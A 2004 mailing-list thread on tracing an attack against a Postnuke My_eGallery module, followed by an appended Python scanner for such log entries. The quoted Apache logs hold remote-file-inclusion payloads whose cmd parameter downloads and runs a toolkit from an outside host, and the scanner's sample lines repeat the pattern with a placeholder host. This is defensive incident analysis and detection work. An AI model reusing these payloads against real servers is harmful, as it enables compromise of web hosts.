RE: [cobalt-users] Howto trace hack

See that safe_mode in php.ini is On, instead of Off.
Then no one can use another user, but their own.

bob

-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx] On Behalf Of Crocket
Sent: Friday 19 March 2004 18:00
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: RE: [cobalt-users] Howto trace hack


Hi,

The kiddies are trying it again and now I managed to identify them and
how they do it: they use the Postnuke My_eGallery module to execute the
crap from their site.

www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/modules/My_eGallery/public/displayCategory.php?%20basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.0" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET /libImage/warning.gif HTTP/1.0" 200 871 "http://xxx.xxx.xxx.xxx/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/modules/My_eGallery/public/displayCategory.php?%20basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

www.domain.com 62.162.59.75 - - [19/Mar/2004:15:53:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.aleksrulz.com/hack.txt?&cmd=cd%20/tmp;wget%20mirabela.net/LegendPort.tgz;tar%20zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 2861 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

I replaced my domain with www.domain.com and my ip with xxx.xxx.xxx.xxx

They are forcing the basepath, which is probably a global in that module.
So they aren't even using a PHP upload form. Anyone know a quick fix to
unset that global? If not I will remove those modules from the sites
and warn my customers.

John
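The log excerpt above shows the two things worth alerting on when a module takes an include path from the request: a query parameter whose value is a remote URL, and a `cmd=` parameter carrying shell commands, visible either in the request line itself or only in the Referer of a later request (the warning.gif line). The following scanner is an added example, not code from this thread or from Postnuke; it assumes Apache combined-log lines with a leading virtual-host field, exactly as in John's excerpt, and the sample lines it runs over are constructed (RFC 5737 addresses, a placeholder attacker host), not taken from a real server.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache "combined" format with a leading virtual-host field, as in the excerpt:
# vhost ip ident user [time] "method uri proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that is itself a URL is the signature of a remote file include.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)
# Shell separators or download/launch verbs inside a parameter value.
SHELL_META_RE = re.compile(r'[;|`&$]|\b(wget|curl|chmod|nohup)\b')

# Constructed sample lines (not real traffic): one include attempt that got a 404,
# one image request whose Referer reveals the injected page, one benign request.
SAMPLE_LOG = [
    'www.domain.com 192.0.2.10 - - [19/Mar/2004:12:43:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/inject.txt?&cmd=cd%20/tmp;wget%20attacker.example/kit.tgz;tar%20-zxvf%20kit.tgz HTTP/1.0" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"',
    'www.domain.com 192.0.2.10 - - [19/Mar/2004:12:43:19 +0100] "GET /libImage/warning.gif HTTP/1.0" 200 871 "http://www.domain.com/modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/inject.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"',
    'www.domain.com 198.51.100.7 - - [19/Mar/2004:16:01:02 +0100] "GET /modules/My_eGallery/public/displayCategory.php?cid=3 HTTP/1.1" 200 2861 "http://www.domain.com/index.php" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-log line into named fields; None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_params(url):
    """Return the reasons a URL's query string looks like remote-include abuse."""
    reasons = []
    query = urlsplit(url).query
    # Split on '&' by hand: the injected values contain ';', which older
    # urllib.parse.parse_qsl versions would also treat as a separator.
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        name = unquote(name).strip()
        value = unquote(value)
        if REMOTE_SCHEME_RE.match(value):
            reasons.append(f"{name}= points at a remote URL")
        if name.lower() == 'cmd' or SHELL_META_RE.search(value):
            reasons.append(f"{name}= carries shell-like content")
    return reasons


def scan(lines):
    """Return (ip, field, status, reasons) for every hit in the request URI or Referer."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for field in ('uri', 'referer'):
            reasons = suspicious_params(entry[field])
            if reasons:
                hits.append((entry['ip'], field, entry['status'], reasons))
    return hits


if __name__ == '__main__':
    for ip, field, status, reasons in scan(SAMPLE_LOG):
        print(f"{ip} [{field}, HTTP {status}] " + "; ".join(reasons))
```

Checking the Referer as well as the request line matters here: the include attempt itself may have been answered with a 404 (as in the first line of John's excerpt), while the later image request served with 200 carries the full injected URL in its Referer, which is the stronger indicator that the injected page actually rendered. The fix side is what John asks about: the module must not take `basepath` from the request at all (with register_globals on, any query parameter becomes a global), and the include target has to be a fixed local directory.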